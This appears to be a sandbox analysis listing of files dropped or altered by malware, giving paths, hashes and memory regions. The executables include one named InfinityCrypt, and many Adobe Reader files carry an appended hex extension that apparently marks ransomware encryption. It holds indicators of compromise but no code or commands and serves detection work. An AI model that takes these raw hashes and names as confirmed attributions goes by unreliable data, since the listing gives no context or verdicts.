C:\Users\Admin\AppData\Local\Temp\_MEI44602\python311.dll

MD5 86e0ad6ba8a9052d1729db2c015daf1c
SHA1 48112072903fff2ec5726cca19cc09e42d6384c7
SHA256 5ecda62f6fd2822355c560412f6d90be46a7f763f0ffeec9854177904632ac2d
SHA512 5d6e32f9ff90a9a584183dad1583aea2327b4aea32184b0ebbec3df41b0b833e6bb3cd40822dd64d1033125f52255812b17e4fa0add38fcda6bab1724dfaa2eb

C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe

MD5 70aa19890b764ae12a01b2790b163692
SHA1 87455fae9f5cbb374b2f30606ee4a82e067b7fe7
SHA256 458681accfbdf2a26f37a49ede080dc5b23d06c8c406980d615764760f01c2ba
SHA512 1614450e6cb6b009577e4174130fcb896c5bc3379159718f0d25493029cff45618bdcb55d3f5444c597f7981175740fc9de7f54ef686e2970678ce12c0d53089

C:\Users\Admin\AppData\Local\Temp\_MEI44602\_bz2.pyd

MD5 afaa11704fda2ed686389080b6ffcb11
SHA1 9a9c83546c2e3b3ccf823e944d5fd07d22318a1b
SHA256 ab34b804da5b8e814b2178754d095a4e8aead77eefd3668da188769392cdb5f4
SHA512 de23bb50f1d416cf4716a5d25fe12f4b66e6226bb39e964d0de0fef1724d35b48c681809589c731d3061a97c62b4dc7b9b7dfe2978f196f2d82ccce286be8a2a

C:\Users\Admin\AppData\Local\Temp\_MEI44602\select.pyd

MD5 0b55f18218f4c8f30105db9f179afb2c
SHA1 f1914831cf0a1af678970824f1c4438cc05f5587
SHA256 e7fe45baef9cee192c65fcfce1790ccb6f3f9b81e86df82c08f838e86275af02
SHA512 428ee25e99f882af5ad0dedf1ccdbeb1b4022ac286af23b209947a910bf02ae18a761f3152990c84397649702d8208fed269aa3e3a3c65770e21ee1eec064cc1

C:\Users\Admin\AppData\Local\Temp\_MEI44602\_socket.pyd

MD5 11b7936a5bd929cc76ac3f4f137b5236
SHA1 09cb712fa43dc008eb5185481a5080997aff82ab
SHA256 8956b11c07d08d289425e7240b8fa37841a27c435617dbbd02bfe3f9405f422b
SHA512 7b050df283a0ad4295a5be47b99d7361f49a3cfd20691e201c5da5349a9eb8f5710ab3a26a66d194567539660ed227411485f4edf2269567a55a6b8ccfd71096

C:\Users\Admin\AppData\Local\Temp\_MEI44602\_ssl.pyd

MD5 0e9e6d6839d74ad40bb9f16cc6601b13
SHA1 6671039088793f4ba42f5bd4409c26b1283ceafa
SHA256 bca1f490c9f7ba25cbbb4b39785dda8aa651123e22d4e7edc299b218c8157a81
SHA512 cb8742ae5db83487c21ba17d9efaca736df49f8f3c4a72355ede119717b83e0b4c6d94bd1c75a992abaf4ab89502a805f81b2529e85fd6a656600d6e7b0c90f5

C:\Users\Admin\AppData\Local\Temp\_MEI44602\psutil\_psutil_windows.pyd

MD5 3e579844160de8322d574501a0f91516
SHA1 c8de193854f7fc94f103bd4ac726246981264508
SHA256 95f01ce7e37f6b4b281dbc76e9b88f28a03cb02d41383cc986803275a1cd6333
SHA512 ee2a026e8e70351d395329c78a07acb1b9440261d2557f639e817a8149ba625173ef196aed3d1c986577d78dc1a7ec9fed759c19346c51511474fe6d235b1817

C:\Users\Admin\AppData\Local\Temp\_MEI44602\_hashlib.pyd

MD5 534902be1d8a57974efd025aff4f11ef
SHA1 1179c6153dc52f72c29fe1591dc9a889c2e229e9
SHA256 30adfb86513282e59d7e27968e1ff6686e43b8559994a50c17be66d0789f82b3
SHA512 7f0cdcf8576faf30fc8104b9bc9586d85ad50b7803074a7bcaa192eed05b1e2bd988a91873554fb63f204fcad86c667e95755c5ff13c43f96dc334ef3ea37240

C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe

MD5 3bb8ce6c0948f1ce43d5dc252727e41e
SHA1 98d41b40056f12a1759d6d3e56ab1fe0192a378f
SHA256 709bddb0cbd2998eb0d8ca8b103b4e3ed76ca8cdc9150a6d0e59e347a0557a47
SHA512 239b8df14d47f698acef2f7c70cbfc943fe66a25553940078b08bf60957f94d6480a8cf5d846e6b880c79ab248e83d8da033cfc6c310a5e2564678b129e7296a

C:\Users\Admin\AppData\Local\Temp\_MEI44602\unicodedata.pyd

MD5 d4323ac0baab59aed34c761f056d50a9
SHA1 843687689d21ede9818c6fc5f3772bcf914f8a6e
SHA256 71d27537eb1e6de76fd145da4fdcbc379dc54de7854c99b2e61aae00109c13d0
SHA512 e31d071ce920b3e83c89505dfa22b2d0f09d43c408fcadbc910f021481c4a53c47919fce0215ae61f00956dcb7171449eabda8eef63a6fdd47aa13c7158577be

C:\Users\Admin\AppData\Local\Temp\_MEI44602\libcrypto-3.dll

MD5 51e8a5281c2092e45d8c97fbdbf39560
SHA1 c499c810ed83aaadce3b267807e593ec6b121211
SHA256 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA512 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

C:\Users\Admin\AppData\Local\Temp\_MEI44602\_lzma.pyd

MD5 2ae2464bfcc442083424bc05ed9be7d2
SHA1 f64b100b59713e51d90d2e016b1fe573b6507b5d
SHA256 64ba475a28781dca81180a1b8722a81893704f8d8fac0b022c846fdcf95b15b9
SHA512 6c3acd3dcae733452ad68477417693af64a7d79558e8ec9f0581289903c2412e2f29195b90e396bfdcd765337a6dea9632e4b8d936ac39b1351cd593cb12ce27

C:\Users\Admin\AppData\Local\Temp\_MEI44602\_queue.pyd

MD5 dbd3c2c0a348a44a96d76100690c606d
SHA1 04e901eac1161255adb16155459ac50f124b30a6
SHA256 2bfd8459ba01c741d676f79ee96802fb2c29cb30f50301d67fde8bbce8e7e7d4
SHA512 99fee97c272bfff4515407d588b2761af7be39a83be070e01128fba71ff75404fbad6352bcdbe5465786ce86a6550f47b177d022ccb53f32f5a482db61bee3b4

C:\Users\Admin\AppData\Local\Temp\_MEI44602\_decimal.pyd

MD5 33f721f1cbb413cd4f26fe0ed4a597e7
SHA1 476d5fab7b2db3f53b90b7cc6099d5541e72883e
SHA256 080d0fbbff68d17b670110c95210347be7b8ab7c385f956f123a66dc2f434ab3
SHA512 8fbc82af0fe063c4eb8fdefae5650924ac607be54b81c4d51064ca720bb85bfc9e1705ba93df5be6add156a6b360dd1f700618862877e28de7c13e21b470b507

C:\Users\Admin\AppData\Local\Temp\_MEI44602\libssl-3.dll

MD5 bfc834bb2310ddf01be9ad9cff7c2a41
SHA1 fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c
SHA256 41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1
SHA512 6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

C:\Users\Admin\AppData\Local\Temp\_MEI44602\Blsvr.exe

MD5 4781c53d9bb1cb237b653c687028203d
SHA1 16a27b614d5eb2500c1cbe0aa25048d27363598f
SHA256 2b6ae672822198b68503b3d37d12025c9d4fc1b7e24ed833f349ecc6fbbfc655
SHA512 6d7b70cbd775598674d85f01b69f3be038b4bf95c8f222c2b7c38e1ec7d379cd747b37dbf50df0440dbb771a85d67c2324b80682cf569f0aa41703d03054ad94

C:\Users\Admin\AppData\Local\Temp\_MEI44602\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI44602\_ctypes.pyd

MD5 78df76aa0ff8c17edc60376724d206cd
SHA1 9818bd514d3d0fc1749b2d5ef9e4d72d781b51dd
SHA256 b75560db79ba6fb56c393a4886eedd72e60df1e2f7f870fe2e356d08155f367b
SHA512 6189c1bd56db5b7a9806960bc27742d97d2794acebc32e0a5f634fe0ff863e1775dcf90224504d5e2920a1192a3c1511fb84d41d7a2b69c67d3bdfbab2f968fa

memory/1556-960-0x0000014916F30000-0x0000014917404000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\InfinityCrypt.exe

MD5 b805db8f6a84475ef76b795b0d1ed6ae
SHA1 7711cb4873e58b7adcf2a2b047b090e78d10c75b
SHA256 f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf
SHA512 62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

memory/1320-971-0x0000000000010000-0x000000000004C000-memory.dmp

memory/1320-973-0x0000000004C90000-0x0000000004CE6000-memory.dmp

C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 a384a4f4ea9690c0aa54f5bea6cae111
SHA1 aaec6bbe16b9a9b4e30ac61f54c2e5347e716c83
SHA256 686e0b18d64404fe08916002fbb4bb3d7cf2c96d8d82113c874a5c909fc4deb2
SHA512 4b6fdc46f571665913976f2b5f9e26d89e472de4ae6c67f55e49ed193e2870e1f82c7e331ebd3df5d60743b6ccc53180f39e9185c5419bbd12f4d9dcffe90ec8

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 ba8d0ef1be6a4c2c8f4638d5b0e99612
SHA1 54d3f105dfa77084252767b5f96700a0338882e1
SHA256 b8410f23450b142b99ce9374ac9697094514a76d476227e2f157fc25c0a731c3
SHA512 7e99decb56aa20c0c36bc93a247d313eb90b36e786f98b905c04da2b48b48eee73013d9c91a6962ac68d28bc6ef8f72178d0c257988e2f8d6e9bf6a1c7c012a5

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 d8f2f198b6392468d89d54402cfac002
SHA1 ff11ba5e54221f9c0679bc182303ff7d29166520
SHA256 e3d64bb061b429b11eb5bfd257dc35d1690c13d62d3fe6fb59f558b78aded82f
SHA512 284d575e734b11e24b9dcead95714f340d69d21e5ccf8195043dd5a1b61d1601f842301a9e0bdae6d32a56c028953ec0cefee25765e155bcbb8d537fa7fe1d64

C:\Windows\SysWOW64\Files\App.exe

MD5 0bd59d737a9b896f8a4207da6ae272bf
SHA1 fea2584c699a36ad3c1964c4c8dfbf496fe20af0
SHA256 bc86f9b06bc173eb53ed47387e690e4bb8de568fe0ca7a18d420ab1ced48fa30
SHA512 e9451f76a74d13fec84f0810af84d990e814b2d84543df1ed17272af1dc80aba10532297264906fd116f219e75086d515a063c29849945302f0db1edc229508d

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 be4f47020a5590f4d5f311591a48e12a
SHA1 2f530f602dc442d8d549bdfd9b62c67ba8314b9c
SHA256 c290e9bf5fa672f783a077aca62e4174a0a1435ecee1e2674d57c2e289fa4226
SHA512 fc75ff47cb0ae2cb9fbc99f79a4c20ea6f1e62bc60cfc49b93f1bd34b517f3605e2865d71219b23ebfd1d63774fd4e6421e81d7c518248447283a7a09d4b7283

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 3912249be1a5413927d247bdb8684966
SHA1 f5da7c2eaf5941fb2ae830f9b8bd054e24c20eb8
SHA256 bb8f8f3b580d5894e4c90be401eff6eb6bb10f46c9410c43e013e4bd12822f3d
SHA512 3ff23946fb7e4e942b818d18909acd77e0f11cf4a50a9cc580a9d57ee628e8287d2c4fc7425e81506c5ef698675d2a690494d89a6eecc56530dbc3be9e9c41d0

memory/2496-2206-0x00007FF768370000-0x00007FF7688E8000-memory.dmp

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 d75e1dfe66c35bfeea180af3e731f65d
SHA1 f01f85098323fd98f027440ac05b198c3f846cc0
SHA256 bdf1858ab9b53eb98407d924402e0d4f29bc8ad2ed8cd6ae9f319de53e4160fe
SHA512 f0846b74f9f9c5cad87756559b851aa6f45d05d455e9f80b09553b55b38dda77406cdc3488d01b76966b787db8b2ec8730e30fe2e3987fbe02f64c9c31179935

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 bebf102bb8c09c4c8e8ee74bd5ace36b
SHA1 42acf5b0ade2fa3bf1f83aba251402140c8ef708
SHA256 ff827be9e92505f90a35edc167a013744f9ae82a602cd35961d61cd80e822d24
SHA512 8a89d8316b78179abc8848385ab114586ddb67b8c9511736b889d58b70433516f9c43b63e9dbf61f42d628282ce136fe027afcda4cdc38e0ed7759701b1919c0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 5894c97a13f694e51d6c84516d4228b4
SHA1 8a6a74a30638750f4ace46438003e2761f6861bf
SHA256 122a84a73072f16dd7da96401428ec0d87ae350f3fe036cff635b8cf9b0bcb8c
SHA512 85b447ac9a94856fed62adc14aee92b68455b10d1947748626cb4a8f3ba4a5430756b6457710af15cadae6b801461766d0011e89d267f6e98c4d4dc773308bbe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 58d39e7ba1a001b9c807efdeec43ce30
SHA1 31c0a77783d2e421a16343b628791bb09ad55c98
SHA256 4e84b7774a9f0843e5cefcb13a0ae5a9bb3a3b31e07b1d283556e92ebe21cd99
SHA512 bd8bd74d73315b363def6deec74bac60d28a86220db2f4a6a273d76ec2d2836a7e057b4276db7eea26f657cc48fa2f39b6f88abf51607efcb2b24662764fe8a8

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 97bed8d32d0928c99f8d702dba28a178
SHA1 d9673dbc2c5e0a112248f8521e0755375bd5592b
SHA256 ae5d8f769578b6aeb3252976add4961bcaa75373ca0366a072cace12989a38c6
SHA512 d4d36830653e53b2d08fec03f3be04bdfb6b8120629742e98eec5b09ef78ed08f12f5d18cc34618ee1cf2ee8f3e1c615695c25f43472323409c2006515c32936

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 0cba0e28755ea3cf62ab770943784e49
SHA1 077f114c6908dfe459d9fe8d4ef195246261cdde
SHA256 f749a5c1f37824b58ecc990d9209560853eda5701b2de1a1eed5610ce9947934
SHA512 c9d18c42f6656998b209def6dfee100a3bd47ab29a80457265c8eea49ac60e382036c276612adf0101016d4da317644a77cdaaa42f6f88d9b4bf318204502983

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 8edb32f28d8defc8c04f49cb7d4e9c31
SHA1 ae3b3a1aefd6743eaf161efbd8f60a84447e744d
SHA256 db7890c5a647c82988ece17cb24460e7b25c5aa897cd30c50b715adf906aead2
SHA512 4e56a54392d8b9b513bd01666be390a7288feb290f86c73d65f53053d851996bc25eea35a98980b349ba406c810ed22967c3b6f95b2d07f96d046e8fc57ff41b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_pattern_RHP.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 f0f51a82de2e57f67826ace479576cb4
SHA1 f6b69231d3167b7058c45c06c08b3cc14bae30e9
SHA256 fa9baa71074ca690d402b2cee5e3811cf863a28b38476699cf2076c502056f6b
SHA512 d61eba9eb91e9b763f84f6b519b1f0b5780ad232cb1651b980a6b76aafd0c76c922b4e058209f70fce5d3c8fb014a6ddcf3496ff6315fc2b5257bfc1a1276f63

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 72d64177e739cadb178ba17075bdc752
SHA1 226da4b3ec29c79f229472296f33e29585f58db9
SHA256 70750d9276a577cd67aa47828b6afcb9717268d1664a4b79fc928f0be89c3e10
SHA512 6f7b814a9325986f7026e4d2053442a07690e8d697fe58eec1e421e27455bd75817211ceb20d28b00d437534c014645ea0b42c7dfbf1d2a9ffa3532388d12001

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 54186f37b791536e4f39826d62d72236
SHA1 ad0b9a2ba4786429d73a4dd93dfa4fed1d59c73a
SHA256 cd17a4829caf97a8e7bfa4ad60d3184f5da5d5de83160805b8c34e300dc191f2
SHA512 99ccc6ff85329a45ba1e98b451a7ea0c6d3f011eb44f82e463e9ffaf318d66c8936942622b0b1971451f6fb8391270af2f2dd6f902a2014df0c583dcc6c8c426

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 fd6edf33d50fd046f5b957a364ca225d
SHA1 cb63bf655b6899ff2b8ec77d4544ce744d52c587
SHA256 198c394dfa30b2040590f67bb887b337d0d97004c4142e8f5ddd59713851722d
SHA512 51ace6568804a36913ae536cdba205269148564530cbacbd54ee7c979272b0949e5f17eb4773839f483d47ced82c875ba7e5f28539cfbca047a06d529ca214ed

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 8f250ae3b26f990048540c6f7a0bc812
SHA1 d9dcb3ce234359d3211ded6c21b05fbaee7daed1
SHA256 08ac36762390f19eb2fa415a5908fafe54b96e220096370f8cb2023929dc6c01
SHA512 19ccc108fe1728a957c616c516f14c206f07fced2a0e568df991daa842e5175fcb9b42ebedd028ba1f591410dfda5e26dc851c139b26514b15b382f17614dc7a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 58c3fc1951a2bfe36e52d8d38e8abe25
SHA1 f5f1e20f58a9e437a3cee2c4b30170388d4ab8a6
SHA256 02a0655974b3eb260556c16395b310eb68c89ece83e8f0d8fbca9af01f805122
SHA512 55b7ea21d57ab83f856b99b3eca97f4dc703fe3ae20fb47f7ae4e1e3ba0f661478012f8a493363a9e11da3bbbb796015b1e7b5f5b10feffb66f89bb50ffa9ea8

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 6dd5f8889a0d7eac9b7bb17f741667ab
SHA1 5148d4d1da9f16438397f924d98f307d6105087a
SHA256 b1cdf2e73faf80832fde52b0679ac108ead60f0149eb9a028e059fc65bf46ca9
SHA512 7bf5c2c081d3ebf8d8bca37bc9cc40771837ca5075b8c99f504eec291155e27dbde28debcb5cec555602b73584649ebe5d8eba472dd1e988ee4f5ac7c84ed1b7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 4c10a017bb86d5b69377a213ab0e843e
SHA1 04e31640f834eb738a934d05e7efa5db6905852c
SHA256 0b06b493cec1e91c7a4ff92e564b788f69b98acfdd2589ea848d14ee4b85daf5
SHA512 59f41f5b086b45692154e8bd0e84b2b9d2ab77305b9e6ffc2d1c619faedd2c79b9f57c02398553e411a96051047675dc0c5f8c25e686c44dc10cddfc6f679cdf

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 93eafd5962f2359e9f312412eda5bcdc
SHA1 d8166cef4d1caea17f8f1f25f8d6d3a774a512c9
SHA256 f6872c9cdd4ad26a709644155ef34eafea868b8286c247683e7295f2dfd28560
SHA512 fc574b74638a08925680f1633cb88e776d98005e0305752ca34d38793b12f7419a1ce8b008377442326202d49f46f964f9a0c265ea44c0f96db899c0d3ad4217

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 10b4e9547b2c9c75acff3f61c0bdc5f1
SHA1 564d1fe5b164fce65fb6bdd6d71d2bd12c9e7fdc
SHA256 c9e92cf6a27fac53197a85d10ea66f681e1b720b323b9ec8d508754324068351
SHA512 c78fa6193578026869fbec53a33bfde502f5905beb52ccf50334cd273006d222193b54f197967e26ee6ca93fe69790003f26290b5cb4171b1b270bc7acedd8c9

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 ddea8558a47adac95f877797bc4db116
SHA1 0304d715f52ecf457feb9d040dd22c85b361951b
SHA256 06c8ea14ff4897e9d4073cbcce0dff718bb97ad1306e6e7ab47c351cd4c39004
SHA512 fe24f50203ec41949369a42d5888b2652329c74577ac904844b930d6118a7244fc7d5d1d2035d23b3131f8989894b0de475052753159f2bf906e491b67cbf44e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 2d64cc19b78499db63bf423e44bc78fd
SHA1 cd2d9752bd44e7e7ab6a7080309a5f43a1f17cd2
SHA256 a39c54425eeab22e45be2be80e8c98a0a8c875e04f4e41c3c5afa30d9fe78f56
SHA512 78848071e11606498605f6feb1b4620eb65741276f635c10977c4af3efd6e568589af4307135c01b99ffaa9f315577764f2839ad2f18b889308620bf08cb31df

memory/476-3367-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3365-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3363-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3361-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3359-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3356-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3354-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3351-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3349-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3347-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3344-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3341-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3339-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3338-0x000001F2C09A0000-0x000001F2C09A1000-memory.dmp

memory/476-3369-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 6101a24e3d31922211264e999f63ea60
SHA1 445c9b8a77f9e5bad1d42a9f58304fca8b383698
SHA256 4ceb7d0f6f08a934cfd7b28534ff892120e09811b1f238359f8580dd2d5b8d85
SHA512 7f931cf561cd948ba5aa539ce1a3265d7f56a8b58fe36072b2411f1b5273eec3affff172e8132322b5d30d4d6b1ed1d4a5c1ff4bac2cd5bd469448b71abbc439

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 6af7c9be587fda3d1baec391a0199468
SHA1 408e89450686dea4e520c937382e40a387a92c7e
SHA256 135ef46c1ac58d07f6a8c784d4239234dc5cc7d59e67c5aabca8ac31d3969c10
SHA512 6659210b599e3a3dbbbd90432d5d2d8fde21bde3b1712d7a46766e99ae6c8805da088281956695828f42ee0106b04f97f631645d0a8b687d596bea3a13f59ddb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 6c727716a687da248bb8a72aedb1b2c6
SHA1 d4025dcfb1488475f0b3908ba6e3834b15df932b
SHA256 30f2a57a46add6a542cbb6d94b3c22c511729e9583baba4983b6ccba88917064
SHA512 346242ca746ea198d3e025dde50078589cff68332c83fdc89272d5fde8f5233892de779d5c6742f8a80d3843f3c9b43f1abd83eb21379216683ae38556897804

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 eee463c1fdb40cf6af8aa49f8ac15f26
SHA1 23512e1cfe69656f9076783cc31f5bdd2b342cb4
SHA256 1e069bdb7a2c7741fc53e4b0271e2ff4bac1a159ef7ca464ebf3e761d0f7986c
SHA512 65ca996619fe748eb9bcfadc2f13babb40c13c16e122c1b72dc51c902e24f44ea1f175a8c241ebab69c4b4eeaabee7248c82e92c8554ea92adb5bf8685cd1fb3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 a6d118cd234c4fb55234b5f834308688
SHA1 bc73270cb211e7aac9f116b50add03017326d5a4
SHA256 0a840b64c2b05145459c700817befdfecfeb615f21541b175358ccf2a692e5ec
SHA512 a9c234e5e42cbbad60c31d0a1c657adda6ee1e2a2e6fc54e2831457b230c1cf4d4c72199ee032b70d87ee5c270c6f32ca8db61baeb6230b371bab112e82be7a1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 4de509e1dbc2538ec15eacd2101c7377
SHA1 377f7cae02e406b7b1461d57df6434a0a054ad32
SHA256 32fa42995df81cf7117b8ced9df5328de4c893c8c7732f3dd7c4b0940bfe1009
SHA512 4caec8274849f735d986b15fd188242c14ec49924d4e4a6303690ddb8b7e479b0a223c969614aa3f04abb0ba0e696e4e378f01e114e47fab168befed7ef5fa42

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 49eaa9e36b182ebec8684a2e4347f3fc
SHA1 8cf144c9adac734aecf46dd93d8a6a9b23b1344e
SHA256 886abc2cd33fe12e29bf446bb24c08983b37cc532ba19799610247fe0fc7e5a1
SHA512 bd836f62d8e9c04503b2719ee8222d4cdb901756b029b0192dff569f41f055ac045a51db9a53013b0bd0bfe69a8052bdc1b6bda0c73a2a087a4dc7746d65efd6

